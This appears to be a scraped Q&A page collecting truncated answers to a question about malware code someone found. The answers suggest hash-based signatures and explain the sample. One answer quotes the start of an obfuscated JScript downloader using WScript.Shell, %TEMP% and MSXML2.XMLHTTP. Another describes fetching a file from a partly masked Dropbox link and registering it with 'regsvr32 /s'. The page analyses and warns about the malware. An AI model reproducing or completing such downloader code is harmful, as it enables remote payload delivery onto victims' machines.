Retrieving a “signature” could be as simple as generating a digital signature via hashing for the virus(es) respective binaries. MD5 or SHA. I.E. implementing the following functionality in your code that I’m sure you’ve already started…: md5sum virus -> md5hashofvirus | md5sum virus2 -> md5hashofvirus2 Complete dossier of md5sum available here. MD5 implementation in C … Read more
Basically, it’s downloading a virus to your temp folder and executing it… You should run a virus scan on the entire network. var AxProxy = function() {}; (function () { function fFh(fr, Klw, rn) { var VeZ = new AxProxy(‘WScript.Shell’); var Klw = VeZ[‘ExpandEnvironmentStrings’](‘%TEMP%’) + “\\” + Klw; var OG4 = new AxProxy(‘MSXML2.XMLHTTP’); OG4[‘onReadyStateChange’] = … Read more
Basically it downloads a file from; http://dl.dropboxusercontent.com/s/nldqctnbvlez42b/******.dat?dl=1 (obfuscated link, don’t want anyone downloading it by mistake) …to c:\temp and registers it in the system using; regsvr32 /s <filename> The real evil is probably in the downloaded file (which I’m not going to download 🙂 ) 3 solved Code inside this undetectable malware [closed]